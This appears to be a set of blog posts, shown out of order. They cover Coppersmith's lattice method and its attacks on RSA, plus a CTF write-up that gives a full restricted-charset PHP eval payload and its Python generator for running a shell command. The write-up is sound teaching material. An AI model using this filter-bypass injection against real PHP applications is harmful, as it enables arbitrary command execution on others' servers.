By combining the two ideas, we will get a much higher bound. This is exactly the method used in Coppersmith’s Theorem.
Theorem (Coppersmith) Let \(0<\varepsilon < \min\{0.18,\frac 1d\}\). Let \(F(x)\) be a monic irreducible polynomial of degree \(d\) with root(s) \(x_0\) modulo \(N\) such that \(\lvert x_0\rvert < \frac 1 2 N^{\frac 1 d - \varepsilon}\). Then such root(s) can be found in polynomial time of \(d\), \(\frac 1 \varepsilon\) and \(\log N\).
We note that even though we have an \(\varepsilon\) term, we can “improve” the bound to \(N^{\frac 1d}\) by exhaustive search on the top few bits of \(x_0\).
Let \(h\) be an integer (to be determined later) depending on \(d\) and \(\varepsilon\). We consider the lattice containing vectors corresponding to the polynomials\[G_{ij}(x)=N^{h-1-j}F(x)^jx^i\]where \(0 \leq i<d, 0\leq j< h\). As above, if \(x_0\) is a solution to \(F(x)\equiv 0\pmod{N}\), then \(G_{ij}(x_0)\equiv 0\pmod{N^{h-1}}\). We also notice that the degree of \(G_{ij}\) is \(dj+i\), so the degree runs through 0 to \(dh-1\) exactly once.
In this way, the polynomials correspond to (row) vectors \(b_{G_{ij}}\), and the rows of the matrix formed by these vectors can be rearranged to form a lower triangular matrix with diagonal entries \(N^{h-1-j}X^{dj+i}\). The determinant of this matrix is therefore \(N^{\frac{dh(h-1)}{2}}X^{\frac{dh(dh-1)}{2}}\), and the lattice has dimension \(dh\).
Now as before, run LLL on the lattice, and the first vector \(b_1\) will satisfy \(\|b_1\|\leq 2^{\frac{dh-1}{4}}\left(\det L\right)^{\frac{1}{dh}}=2^{\frac{dh-1}{4}}N^{\frac 12 (h-1)}X^{\frac{dh-1}{2}}\). This vector corresponds to a polynomial \(G(x)\) with \(G(x_0)\equiv 0\pmod{N^{h-1}}\). If \(\|b_1\|< \frac{N^{h-1}}{\sqrt{dh}}\), then by Howgrave-Graham \(G(x_0)=0\) over the integers. So our goal becomes
\[\begin{align*} 2^{\frac{dh-1}{4}}N^{\frac 12 (h-1)}X^{\frac{dh-1}{2}} <& \frac{N^{h-1}}{\sqrt{dh}}\\ \sqrt{dh} 2^{\frac{dh-1}{4}}X^{\frac{dh-1}{2}} <& N^{\frac 12 (h-1)}\\ c(d,h)X<& N^{\frac{h-1}{dh-1}} \end{align*}\]where \(c(d,h)=\left(\sqrt{dh}2^{\frac{dh-1}{4}}\right)^{\frac{2}{dh-1}}=\sqrt{2}(dh)^{\frac{1}{dh-1}}\).
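The lattice basis built from the polynomials \(G_{ij}\) can be written down explicitly. The sketch below constructs the rows \(b_{G_{ij}}\) in pure Python (coefficient lists, lowest degree first) and leaves the LLL step to a library of your choice. The function names and the toy values of \(F\), \(N\), \(h\) and \(X\) are assumptions of this example.

```python
import math

def poly_mul(f, g):
    """Multiply two polynomials given as coefficient lists (lowest degree first)."""
    out = [0] * (len(f) + len(g) - 1)
    for i, a in enumerate(f):
        for j, b in enumerate(g):
            out[i + j] += a * b
    return out

def coppersmith_basis(F, N, h, X):
    """Rows b_{G_ij} for G_ij(x) = N^(h-1-j) * F(x)^j * x^i, ordered by degree d*j + i."""
    d = len(F) - 1
    dim = d * h
    rows = []
    F_pow = [1]                                   # F(x)^j, starting with j = 0
    for j in range(h):
        for i in range(d):
            G = [0] * i + [N ** (h - 1 - j) * c for c in F_pow]   # times x^i
            row = [c * X ** t for t, c in enumerate(G)]           # scale x^t by X^t
            rows.append(row + [0] * (dim - len(row)))
        F_pow = poly_mul(F_pow, F)
    return rows

F = [19, 14, 1]          # toy monic polynomial x^2 + 14x + 19
N, h, X = 35, 3, 2
rows = coppersmith_basis(F, N, h, X)
diagonal = [rows[r][r] for r in range(len(rows))]
print(diagonal)
```

Because \(F\) is monic, row number \(dj+i\) has leading entry \(N^{h-1-j}X^{dj+i}\) on the diagonal and zeros to the right of it, so the determinant is just the product of the diagonal.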
Now the power of \(N\) is
\[\begin{align*} \frac{h-1}{dh-1} =& \frac{d(h-1)}{d(dh-1)}\\ =& \frac{dh-1+1-d}{d(dh-1)}\\ =&\frac 1d - \frac{d-1}{d(dh-1)} \end{align*}\]If we set \(\varepsilon = \frac{d-1}{d(dh-1)}\), then \(dh = \frac{d-1}{d\varepsilon}+1\). So \(c(d,h)\) becomes \[\sqrt{2}(dh)^{\frac{1}{dh-1}} = \sqrt{2}\left(1+\frac{d-1}{d\varepsilon}\right)^{\frac{d\varepsilon}{d-1}}=\sqrt{2}\left(1+\frac 1u\right)^{u}\] where \(u=\frac{d\varepsilon}{d-1}\). Going back to the original inequality on \(X\), we have \(c(d,h)X< N^{\frac{h-1}{dh-1}}\), and substituting the variables nets \[X < \frac{1}{c(d,h)}N^{\frac 1d - \varepsilon}\]
Our original theorem statement requires \(X<\frac 12 N^{\frac 1d - \varepsilon}\), so it seems that we will need \(c(d,h)\leq 2\). Luckily \(c(d,h)=\sqrt{2}(1+\frac 1u)^u\), and \((1+\frac 1u)^u \leq \sqrt{2}\) for \(0< u\leq 0.18\). Since \(u=\frac{d\varepsilon}{d-1}\), this asks for \(\varepsilon \leq (1-\frac 1d)0.18\), so we essentially just need to make sure that \(\varepsilon \leq 0.18\) (up to the factor \(1-\frac 1d\)), which is the case in the assumption.
Since \(h = \frac{d-1}{d^2\varepsilon}+\frac 1d = \frac{1}{d\varepsilon} - \frac{1}{d^2\varepsilon} + \frac 1d \approx \frac{1}{d\varepsilon}\), setting \(h\) to be larger than \(\frac{1}{d\varepsilon}\) will make Howgrave-Graham work.
For the polynomial time part, we note that the lattice \(L\) to be reduced has dimension \(dh\approx\frac 1\varepsilon\), and the coefficients of the polynomials are bounded by \(N^h\). QED.
Next time we will try to prove the recovery of \(N=pq\) given partial knowledge of \(p\).
Galbraith, S. D. (2012). Mathematics of public key cryptography. Cambridge University Press.
Note that \(h\) is “to be determined later”. Indeed it seems that we should have chosen \(h\) first, and then checked whether the condition of Howgrave-Graham is satisfied given the constraints of the theorem. However, we are actually deriving the value of \(h\) that fits the condition. Then if we go back and substitute the instances of (the unknown) \(h\) with the values we got at the end, we will be able to complete the proof.
Here we end this post with an example of these “to be determined later” that appears in mathematics. In calculus (or actually basic mathematical analysis), we say the limit of a function \(f(x)\) at a point \(a\) is \(L\) if for any \(\varepsilon>0\), there exists a \(\delta>0\) (that depends on \(\varepsilon\) only), such that for any \(x\) such that \(0<\lvert x-a\rvert < \delta\), we have that \[\lvert f(x)-L\rvert < \varepsilon.\]
The statement just means, intuitively, that the value of \(f(x)\) can get arbitrarily close to the value \(L\) if \(x\) is close enough to \(a\). This is like a challenge-response protocol, where we are given a desired distance away from \(L\), and we should provide a response that consists of the range of \(x\) (near \(a\)) that can achieve the desired distance.
For instance, let’s try to prove that \[\lim\limits_{x\to 1}\frac 1x = 1\] with the definition.
For any \(\varepsilon>0\), \(\left\lvert \frac 1x - 1 \right\rvert = \left\lvert \frac{x-1}{x} \right\rvert = \frac{\lvert x-1 \rvert}{\lvert x \rvert}\).
If \(\lvert x-1\rvert < \frac 12\), then \(\frac 12 < x < \frac 32\). In particular \(x > \frac 1 2\), so with that assumption, we can have \(\frac{\lvert x-1 \rvert}{\lvert x \rvert} < 2\lvert x-1 \rvert\).
If further \(\lvert x-1 \rvert < \frac \varepsilon 2\), then \(2\lvert x-1 \rvert < \varepsilon\).
Now when we look back at the derivations, we find that \(\delta\) should be no larger than both \(\frac 12\) and \(\frac\varepsilon 2\), so that the requirement of \(\left\lvert \frac 1x - 1 \right\rvert < \varepsilon\) is satisfied. Let’s see how we will actually present the proof:
Proof: For any \(\varepsilon>0\), set \(\delta = \min\{\frac 12, \frac\varepsilon 2\}\). Then for any \(x\) such that \(0 < \lvert x-1\rvert < \delta\),
\[\begin{align*} \left\lvert \frac 1x - 1 \right\rvert =& \left\lvert \frac{x-1}{x} \right\rvert\\ =& \frac{\lvert x-1 \rvert}{\lvert x \rvert}\\ <& 2\lvert x-1 \rvert\\ <& \varepsilon \end{align*}\]So \(\lim\limits_{x\to 1}\frac 1x = 1\) by definition.
See how the logic is kind of reversed? This is indeed because of the fact that we have already derived the whole thing in order to figure out the required value of \(\delta\) to satisfy the condition.
I wrote this write-up on 28 Apr 2019 after the CTF ended. At the time I was still very new to CTF (now also very new), so the formatting and the quality of this write-up are not so good. This is just for my archive purposes.
The code reads
<?=@preg_match('/^[\(\)\*\-\.\[\]\^]+$/',($_=$_GET["🥥"]))&&!(strlen($_)>>10)?@eval("set_error_handler(function(){exit();});error_get_last()&&exit();return $_;"):!highlight_file(__FILE__);
In pseudocode, we can write this as
if input contains only ()*-.[]^ and length of input < 1024:
(with exit on error) eval input and print the return value
else:
show the source code
Our goal is to execute `/checksec.sh` (the common goal of the whole CTF).
In short, we can run whatever we want, but the command needs to contain only `()*-.[]^`, and the command needs to be less than 1024 characters. Also, any error/warning/notice will cause the program to exit.
The idea of restricting the allowed characters is not new: perhaps the most famous one is JSFuck, which can turn any JavaScript code into valid JavaScript code that uses only `()[]!+`. At first glance, it seems that we are even better off than JSFuck, since we have more characters. But actually no. The reason is that we don’t have `+`; instead we get this awkward charset of `*-.^`. Even the simple number `3` can only be constructed by `10-1-1-1-1-1-1-1` instead of the obvious `1+1+1`.
With inspiration from JSFuck, trial and error, and the great behavior of PHP, we can begin to assemble some simple characters: 0 can be expressed by `[]^[]`, and 1 can be expressed by `[]^[[]]`.
With the help of `.`, which acts as the concatenation operator for strings, we can express 10 by `([]^[[]]).([]^[])`. Then we can get the other numbers by repeatedly subtracting 1 from 10.
So for example, 6 is \(10-1-1-1-1\), or equivalently \(7-1\), or `([]^[[]]).([]^[])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])`. So we can construct all the numbers we want.
Now we want some English letters. Luckily we have floating point numbers, which have `INF` and scientific notation like `1.234E+45`. So now we can use I, N, F, ., E, + as well. Of course we cannot do something like `(INF)[0]` since INF is a number (a float), but we can concatenate a 0 at the back to make it a string, i.e. do `(INF . 0)[0]`, which is equivalent to `'INF0'[0]`. At the same time, observe that we can get `-` just by using `(-1 . 0)[0]`.
Now, by using what we have, we can try to construct our payload. We should do something like `exec('/checksec.sh')`. Although we can only input strings, not identifiers, doing `'exec'('/checksec.sh')` will still result in a function call in PHP. Also, we can try to reduce the characters we use by using filename expansion in bash, i.e. using `*` to match our file. So now we can reduce the payload to `'exec'('/*.*')`.
Now we need to construct the characters that we need: `exc/*.`. PHP function names are case-insensitive, so “EXC” will also work. This leaves us to construct “xc/*”. The main technique for doing so is xor:
\[x=y \wedge z,\]
where x is the character we want, and y, z are characters we have. Notice that
\[x = y \wedge z \iff x \wedge y = z\]
So we can try to xor the characters we want with the characters we have, and hope that we get some characters that we have by some trial-and-error. For example: \(c \wedge N = -\), so \(c = N \wedge -\), and we have both ‘N’ and ‘-’ already.
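The trial-and-error search can be automated. The sketch below, written in Python to match the generator script at the end of this write-up, looks for pairs of already-available characters whose xor gives a wanted character. The alphabet string is an assumption based on the characters collected so far (digits, `I`, `N`, `F`, `E`, `.`, `+`, `-`).

```python
from itertools import combinations

available = "INF.E+-0123456789"   # characters we can already build (assumed list)
targets = "xc/*h"                 # characters we still want

def xor_pairs(target, alphabet):
    """All unordered pairs (a, b) from the alphabet with a ^ b == target."""
    return [(a, b) for a, b in combinations(alphabet, 2)
            if ord(a) ^ ord(b) == ord(target)]

found = {t: xor_pairs(t, available) for t in targets}
for t, pairs in found.items():
    print(repr(t), pairs)
```

Characters for which no pair shows up cannot be obtained from a single xor of two available characters, so they need a different trick.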
Another way is to get the characters we want by xor-ing neighboring characters with a small ‘number’, e.g.:
\[* = . \wedge \texttt{0x04} = . \wedge ( 4 \wedge 0)\]
Here we need the strings `'4'` and `'0'` (not the integers), so we need to do `'.' xor ((4 . 0) xor (0 . 0))`.
By now we are able to construct all the characters needed for our payload. But if we check the length of our payload, it will be something like 12xx characters (originally with all lower case characters, the payload is 22xx characters long) ! We need to reduce the character count.
Now we turn to the hint by the author:
/*.*
For the first hint, notice that we can reduce the payload to just `/*h` and it will still expand to `/checksec.sh` correctly.
For the second hint, observe that in PHP, a longer string xor a shorter string gives us a string of the shorter length. In fact, we made use of this fact in `'*' = '.' xor ((4 . 0) xor (0 . 0))`.
The third hint (along with the second one) is the one that helped to drop the length to below 1024. First we know that we can construct `/` and `*` by `'/' = '-' ^ "\x02"` and `'*' = '.' ^ "\x04"`. A naive attempt is to combine them to yield
\[/* = -. \wedge \texttt{0x0204} = -. \wedge 24 \wedge 00,\]
but notice that the number of characters required to construct this is the same! Here, a big observation is that we can have
\[/* = -. \wedge 24 \wedge 00 = -4 \wedge 2. \wedge 00\]
Since we can use a long string for the xor, provided that we have a ‘00’ to restrict the length of the final output of the xor to 2, we can get `2.` by finding a floating point number `2.???????E+???`, so we have
\[/* = -4 \wedge 2.\text{????}\textbf{E+}\text{????} \wedge 00\]
And constructing -4 and a floating point number starting with 2. takes much less space than the individual numbers 2, 4 and the characters `-` and `.`. The final payload has length 928. On a high level, it is `'ExEc'('/*h')`. In full, the payload is as follows (for those who are too lazy to run the Python script themselves):
((((([]^[[]]).([]^[]))**(([]^[[]]).([]^[]).([]^[])).([]^[]))[([]^[[]]).([]^[])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])]).((((([]^[[]]).([]^[])-([]^[[]]))**(([]^[[]]).([]^[]).([]^[]).([]^[])).([]^[]))[([]^[])])^(([]^[[]]).([]^[]))).(((([]^[[]]).([]^[]))**(([]^[[]]).([]^[]).([]^[])).([]^[]))[([]^[[]]).([]^[])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])]).((((([]^[[]]).([]^[])-([]^[[]]))**(([]^[[]]).([]^[]).([]^[]).([]^[])).([]^[]))[([]^[[]])])^(((-([]^[[]])).([]^[]))[([]^[])])))((((-(([]^[[]]).([]^[])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]])-([]^[[]]))).([]^[]))^((((([]^[[]]).([]^[])-([]^[[]])))**(([]^[[]]).([]^[]).([]^[]))).([]^[]))^(([]^[]).([]^[]))).((((([]^[[]]).([]^[]))**(([]^[[]]).([]^[]).([]^[])).([]^[]))[([]^[[]])])^(((([]^[[]]).([]^[])-([]^[[]]))**(([]^[[]]).([]^[]).([]^[]).([]^[])).([]^[]))[([]^[[]]).([]^[[]])^(([]^[[]]).([]^[])-([]^[[]]))])))
which does give us the flag as desired. You can find the code that generates the payload below:
zero = "([]^[])"
one = "([]^[[]])"
ten = f"{one}.{zero}"
nine = f"{ten}-{one}"
eight = f"{nine}-{one}"
seven = f"{eight}-{one}"
six = f"{seven}-{one}"
five = f"{six}-{one}"
four = f"{five}-{one}"
three = f"{four}-{one}"
two = f"{one}.{one}^({nine})" # A small optimization over 3 - 1
INF = f"({nine})**({one}.{zero}.{zero}.{zero})"
I = f"({INF}.{zero})[{zero}]" # used for x
N = f"({INF}.{zero})[{one}]" # used for e,c
F = f"({INF}.{zero})[{two}]"
sf = f"({one}.{zero})**({one}.{zero}.{zero}).{zero}" # 1.0E+100
dot = f"({sf})[{one}]"
E = f"({sf})[{three}]"
plus = f"({sf})[({four})]"
minus = f"((-{one}).{zero})[{zero}]"
sf2 = f"(({nine}))**({one}.{zero}.{zero})" # 2.<whatever>
slashstar = f"((-({four})).{zero})^(({sf2}).{zero})^({zero}.{zero})"
c = f"({N})^({minus})"
x = f"({I})^({one}.{zero})"
h = f"({dot})^({F})"
payload = f"(({E}).({x}).({E}).({c}))(({slashstar}).({h}))"
print(f"total: {len(payload)}")
print(payload)
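As a sanity check of the xor identities used in this write-up, PHP's string xor (which truncates the result to the shorter operand) can be imitated in Python with `zip`. The helper name `php_xor` is made up, and the float string `2.65E+950` is only a stand-in for whatever PHP actually prints for the large power; only its first two characters matter here.

```python
def php_xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings like PHP's ^ on strings: the result has the shorter length."""
    return bytes(x ^ y for x, y in zip(a, b))

# '*' = '.' xor ("40" xor "00"): the one-character operand truncates the result.
star = php_xor(b".", php_xor(b"40", b"00"))

# "/*" = "-4" xor "2.<rest of the float>" xor "00"
float_string = b"2.65E+950"   # hypothetical stand-in for a float starting with "2."
slash_star = php_xor(php_xor(b"-4", float_string), b"00")

# Single characters used in the generator: c = N ^ -, x = I ^ "10", h = . ^ F
c = php_xor(b"N", b"-")
x = php_xor(b"I", b"10")
h = php_xor(b".", b"F")
print(star, slash_star, c, x, h)
```

This only models the byte-level xor; it does not reproduce PHP's type juggling between integers, floats and strings.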
You can find (sage) code that implements the below-mentioned attack on https://github.com/mimoo/RSA-and-LLL-attacks, although they used a weaker (read: more flexible) version of the statements.
Prerequisite: Lattice-based Cryptography basics
Let’s say we have a polynomial \(f(x) = \sum_{i=0}^n a_i x^i\) where \(a_n\neq 0\). Then \(n\) is called the degree of \(f\). We can restrict the domain of \(x\) and the coefficients^{1} to integers mod \(N\), so we can talk about the roots of a polynomial \(f(x)\equiv 0\pmod{N}\).
But how about if we do not know the factorization? The answer is that in general it is hard to solve polynomials if we do not have the factorization. To see why, we note that \[x^2-1\equiv 0\pmod{pq}\]
has 4 solutions (\(p\) and \(q\) are distinct odd primes). If \(a\) is a solution to \(f(x)=x^2-1\) mod \(pq\) other than \(\pm 1\), then \((a-1)(a+1)\equiv 0\pmod{pq}\), so \(a-1\) is divisible by either \(p\) or \(q\) (but not both), and \(\gcd(a-1,pq)\) gives a factor of \(pq\). This shows that solving polynomials mod \(N\) with unknown factorization is in general at least as hard as factoring large integers, for which we also do not have a fast algorithm. However, as always, if we can relax our conditions, we may be able to find some solutions.
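A tiny numeric example makes the reduction concrete. With the toy modulus \(77 = 7\cdot 11\) (values chosen only for illustration), brute force finds the four square roots of 1, and each nontrivial one reveals a factor through a gcd.

```python
from math import gcd

p, q = 7, 11
N = p * q

# All solutions of x^2 - 1 = 0 (mod N), found by brute force.
roots = [a for a in range(N) if (a * a - 1) % N == 0]

# The roots other than +1 and -1 (mod N) are the interesting ones.
nontrivial = [a for a in roots if a not in (1, N - 1)]

# For such a root, a - 1 is divisible by exactly one of p and q.
factors = sorted({gcd(a - 1, N) for a in nontrivial})
print(roots, factors)
```

So an oracle that returns all roots of a quadratic mod \(N\) would immediately factor \(N\).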
In the case of Coppersmith’s method, we are restricted to finding small roots of a polynomial.
Exercise
- Show that if \(p\) is an odd prime, then \(x^2-1\equiv 0\pmod{p}\) has exactly 2 solutions (namely \(1\) and \(-1\)).
- Use the above to prove that if \(n=pq\) is a product of 2 distinct odd primes, then \(x^2-1\equiv 0\pmod{n}\) has 4 solutions.
More specifically, let \(F(x)\) be a monic and irreducible polynomial with integer coefficients. We want to examine the equation \(F(x)\equiv 0\pmod{N}\).
Definition (Monic) A monic polynomial has its leading coefficient (the coefficient of the highest-degree term) equal to 1.
Actually if the leading coefficient is not 1, we can just multiply the whole polynomial by the inverse of that coefficient mod \(N\), and the polynomial will have the same roots (if the gcd of the coefficient and \(N\) is 1). If the gcd is not 1 then we have just found a factor of \(N\).
Definition (Irreducible) A polynomial \(F(x)\) (with integer coefficients) is irreducible if whenever \(F(x)=g(x)h(x)\), one of \(g(x)\) or \(h(x)\) must be a constant polynomial.
This looks like the usual prime number definition, because in the case of integers, prime and irreducible are the same. Here we make the distinction.
Then we can formulate the main result of Coppersmith.
Theorem (Coppersmith) Let \(0<\varepsilon < \min\{0.18,\frac 1d\}\). Let \(F(x)\) be a monic irreducible polynomial of degree \(d\) with root(s) \(x_0\) modulo \(N\) such that \(\lvert x_0\rvert < \frac 1 2 N^{\frac 1 d - \varepsilon}\). Then such root(s) can be found in polynomial time of \(d\), \(\frac 1 \varepsilon\) and \(\log N\).
Let’s use the RSA setup (\(N=pq\), \(de\equiv 1\pmod{\phi(N)}\), \(E_k(m)=m^e \bmod N\)), and let the public exponent be \(e=3\). Say we have a small message \(m\) to encrypt, with \(m < N^{\frac{1}{3}}\).
If we use textbook RSA, the plaintext can be directly recovered by taking cube root. Suppose we pad the message with ‘1’ bits on the left until the padded message has about the same size as \(N\). Then we have the equation
where we use \(P\) to denote the padding, so
Rearrange to get
which is a cubic polynomial! We can check that the condition of Coppersmith’s theorem is satisfied, so we can apply it to recover the plaintext.
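To make the setup concrete, here is a small sketch that builds the padded message, encrypts it with \(e=3\), and writes down a monic cubic that has the unknown message as a small root mod \(N\). The modulus, the message and the exact padding layout are toy assumptions for illustration; actually finding the root would need an LLL implementation, which is not shown here.

```python
N = 1000003 * 1000033          # toy modulus, far too small for real use
e = 3

m = 0x2A                       # the "unknown" small message (one byte here)
m_bits = 8
pad_bits = N.bit_length() - 1 - m_bits
P = ((1 << pad_bits) - 1) << m_bits   # '1' bits placed to the left of the message

c = pow(P + m, e, N)           # ciphertext of the padded message

# F(x) = (P + x)^3 - c, coefficients from x^0 up to x^3, reduced mod N.
coeffs = [(P ** 3 - c) % N, 3 * P ** 2 % N, 3 * P % N, 1]

def F(x):
    return sum(a * x ** i for i, a in enumerate(coeffs)) % N

print(F(m), m ** 3 < N)
```

An attacker knows \(P\), \(c\) and \(N\), hence all the coefficients, and only the small root \(m\) is missing.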
How about when the message is large? If the padding is linear (perhaps just append or prepend known bits), given at least \(e\) ciphertexts from the same plaintext, we can still recover the message.
Theorem Let \(N_1,\cdots, N_k\) be pairwise coprime integers, and let \(g_i(x)\) be polynomials of degree at most \(q\). If \(M<\min\{N_1,\cdots,N_k\}\) and \(g_i(M)\equiv 0\pmod{N_i}\) for each \(i\), and \(k>q\), then there exists an efficient algorithm to compute \(M\).
Proof Use the Chinese remainder theorem to construct \(g(x)\) such that \(g(M)\equiv 0\pmod{N_1 N_2\cdots N_k}\), then \(M\) and \(g\) satisfy the requirements of Coppersmith’s theorem. Use Coppersmith’s method to recover \(M\).
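In the simplest special case, with no padding at all, \(g_i(x)=x^3-c_i\), and the Chinese remainder theorem already does all the work, since \(M^3 < N_1N_2N_3\) means the combined residue is \(M^3\) over the integers. The sketch below shows only this simplified case with toy moduli; for general (padded) \(g_i\) the last step would be Coppersmith's method rather than a plain cube root.

```python
from math import prod

def crt(residues, moduli):
    """Combine x = r_i (mod n_i) for pairwise coprime n_i into x mod prod(n_i)."""
    M = prod(moduli)
    x = 0
    for r, n in zip(residues, moduli):
        Mi = M // n
        x += r * Mi * pow(Mi, -1, n)   # modular inverse via pow (Python 3.8+)
    return x % M

def integer_cube_root(n):
    """Largest integer r with r^3 <= n, by binary search."""
    lo, hi = 0, 1
    while hi ** 3 <= n:
        hi *= 2
    while hi - lo > 1:                 # invariant: lo^3 <= n < hi^3
        mid = (lo + hi) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid
    return lo

moduli = [1000003, 1000033, 1000037]   # toy pairwise coprime moduli
message = 123456                       # smaller than every modulus
ciphertexts = [pow(message, 3, n) for n in moduli]

recovered = integer_cube_root(crt(ciphertexts, moduli))
print(recovered)
```

Here three ciphertexts are enough because the degree is 3, in line with the requirement \(k>q\) being replaced by \(k\geq e\) in this unpadded case.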
Another version of Coppersmith’s theorem concerns small roots to bivariate polynomials mod \(N\). Here we have \(F(x,y)\) with integer coefficients again. We can again find small roots for the polynomial mod \(N\).
Theorem (Coppersmith)
Let \(F(x,y)\) be a polynomial with integer coefficients and \(d\) a natural number such that both \(\deg_x F, \deg_y F \leq d\). Write \(F(x,y)=\sum_{0\leq i,j\leq d} F_{i,j} x^i y^j\) and define \(W=\max\limits_{0\leq i,j\leq d} \vert F_{i,j}\vert X^i Y^j\) for natural numbers \(X\) and \(Y\).
If \(XY<W^{\frac{2}{3d}}\), then we can find the roots \((x_0,y_0)\) of \(F\) mod \(N\) that satisfy \(\vert x_0\vert \leq X\) and \(\vert y_0\vert \leq Y\) in time polynomial in \(\log W\) and \(2^d\).
Recall \(de = 1 + k\phi(n)\). Since \(\phi(n)=n-p-q+1\) we get \(de = 1+ k(n-p-q+1)\). Now reduce modulo \(e\) and rearrange to get \(2k(\frac{n+1}{2} - \frac{p+q}{2})+1\equiv 0\pmod{e}\). Writing \(A=\frac{n+1}{2}\), we get a bivariate polynomial \(f(x,y)=2x(A+y)+1\pmod{e}\) with small roots \((x_0,y_0)=\left(k,-\frac{p+q}{2}\right)\). We can use Coppersmith’s method (provided that \(d<N^{0.292}\)) to recover the small root and recover \(d\).
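The claim that \(\left(k,-\frac{p+q}{2}\right)\) is a root of \(f\) mod \(e\) is easy to check numerically. The sketch below uses toy values for \(p\), \(q\) and a small private exponent \(d\) (all assumptions for illustration) and only verifies the root; it does not perform the lattice attack itself.

```python
from math import gcd

p, q = 1000003, 1000033        # toy odd factors
n = p * q
phi = (p - 1) * (q - 1)

# Pick a small private exponent d coprime to phi, then derive e.
d = 101
while gcd(d, phi) != 1:
    d += 2
e = pow(d, -1, phi)            # d * e = 1 (mod phi)
k = (d * e - 1) // phi         # so that d * e = 1 + k * phi

A = (n + 1) // 2               # n is odd, so this is an integer
y0 = -((p + q) // 2)           # p + q is even, so this is an integer too

value = 2 * k * (A + y0) + 1   # f(k, y0) before reduction mod e
print(value % e)
```

In fact \(f(k,y_0)\) equals \(de\) exactly, which is why it vanishes mod \(e\).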
Exercise Explain how to recover \(d\) given the small roots \(\left(k,-\frac{p+q}{2}\right)\).
Another theorem related to the Coppersmith’s theorem is the Howgrave-Graham’s^{2} theorem. It allows for an easier proof and better results for Coppersmith’s theorem.
Let’s use the convention that \(F(x)=\sum\limits_{i=0}^d a_i x^i\) be polynomial with integer coefficients with degree \(d\) (so \(a_d\neq 0\)). Let \(x_0\) be a root of \(F(x)\equiv 0\pmod{N}\) such that \(\lvert x_0\rvert < X\) for some integer \(X\). For that \(X\), we associate the polynomial \(F\) with the vector \(b_F = (a_0, a_1X, a_2X^2, \cdots, a_d X^d)\). The norm of a vector \(v=(v_1,\cdots v_n)\) is denoted \(\vert\vert v\rvert\rvert = \sqrt{\sum\limits_{i=1}^n v_i^2}\).
Theorem (Howgrave-Graham) If \(\lvert\lvert b_F\rvert\rvert < \frac{N}{\sqrt{d+1}}\), then \(F(x_0)=0\) over the integers (instead of mod \(N\) only).
Proof First we note that \(\sum\limits_{i=1}^n \lvert x_i\rvert \leq \sqrt{n \cdot \sum\limits_{i=1}^n x_i^2}\) by the Cauchy-Schwarz inequality. Then
\[\begin{align*} \lvert F(x_0)\rvert =& \left\lvert \sum\limits_{i=0}^d a_i x_0^i\right\rvert\\ \leq& \sum\limits_{i=0}^d \lvert a_i\rvert\ \lvert x_0^i\rvert\\ \leq &\sum\limits_{i=0}^d \lvert a_i\rvert X^i\\ \leq &\sqrt{d+1} \lvert\lvert b_F\rvert\rvert\text{ (by the inequality above)}\\ < &\sqrt{d+1}\frac{N}{\sqrt{d+1}}\\ =& N \end{align*}\]So \(-N < F(x_0) < N\). Since \(F(x_0) \equiv 0\pmod{N}\), this means \(F(x_0) = 0\) (without mod).
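The condition in the theorem is easy to test numerically. The following is a minimal sketch, assuming toy values that are not part of the original text (the modulus `N = 101`, the bound `X = 4` and both polynomials are hypothetical): it checks \(\lvert\lvert b_F\rvert\rvert < N/\sqrt{d+1}\) with exact integer arithmetic and compares a polynomial that satisfies the bound with one that does not.

```python
def howgrave_graham_holds(coeffs, X, N):
    """Check ||b_F|| < N / sqrt(d+1) without floating point.

    coeffs = [a_0, a_1, ..., a_d], so b_F = (a_0, a_1*X, ..., a_d*X^d).
    The inequality is squared: (d+1) * ||b_F||^2 < N^2.
    """
    d = len(coeffs) - 1
    norm_sq = sum((a * X**i) ** 2 for i, a in enumerate(coeffs))
    return (d + 1) * norm_sq < N * N


def evaluate(coeffs, x):
    """Evaluate F(x) over the integers."""
    return sum(a * x**i for i, a in enumerate(coeffs))


N = 101   # hypothetical toy modulus
X = 4     # bound on the root, |x0| < X
x0 = 3

# F(x) = x^2 + 2x - 15 has small coefficients and the root x0 = 3.
small = [-15, 2, 1]
# G(x) = x + (N - 3) also has the root 3 mod N, but a large constant term.
large = [N - 3, 1]

for name, poly in (("F", small), ("G", large)):
    print(name,
          "bound holds:", howgrave_graham_holds(poly, X, N),
          "| value mod N:", evaluate(poly, x0) % N,
          "| value over Z:", evaluate(poly, x0))
```

Both polynomials vanish at \(x_0\) modulo \(N\), but only the one whose vector \(b_F\) is short is forced to vanish over the integers, which is why lattice reduction is used to look for short vectors.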
Assume we have an approximation \(\hat{p}\) of \(p\) such that \(p = \hat{p} + x_0\) with \(\lvert x_0\rvert < X\). For example, \(p\) is a \(2k-\)bit integer and \(\hat{p}\) has the same \(k\) MSB as \(p\) (so we know the first half bits of \(p\)), so \(\left\lvert p-\hat{p}\right\rvert < 2^k\). Then we can actually factor the \(4k\)-bit integer \(N=pq\).
We can define the (degree-1) polynomial \(f(x) = \hat{p} + x\), then recovering the small roots of \(f(x)\) mod \(p\) allows us to recover \(p\)! Of course, we do not know \(p\) (that’s the whole point).
However, if we can lift this polynomial to another polynomial \(G\) (with small roots modulo \(p^h\) for some integer \(h\)), such that it satisfies the condition in Howgrave-Graham’s theorem, then we can directly find the root \(x_0\) with \(G(x_0) = 0\) (and \(f(x_0)\equiv 0\pmod{p}\) as well), so we can get \(p\) by computing \(p=\gcd(N, f(x_0))\). Thus we have a similar-looking theorem (originally proved by Coppersmith, later improved by Howgrave-Graham):
Theorem Let \(N=pq\), and \(p<q<2p\). Let \(0<\varepsilon < \frac 14\), and \(\hat{p}\) a natural number such that \(\left\lvert p-\hat{p}\right\rvert < \frac{1}{2\sqrt 2} N^{\frac 14 - \varepsilon}\). Then \(N\) can be factored in polynomial time of \(\log N\) and \(\frac 1\varepsilon\).
We will delay the discussion of the derivations for the second part.
Galbraith, S. D. (2012). Mathematics of public key cryptography. Cambridge University Press.
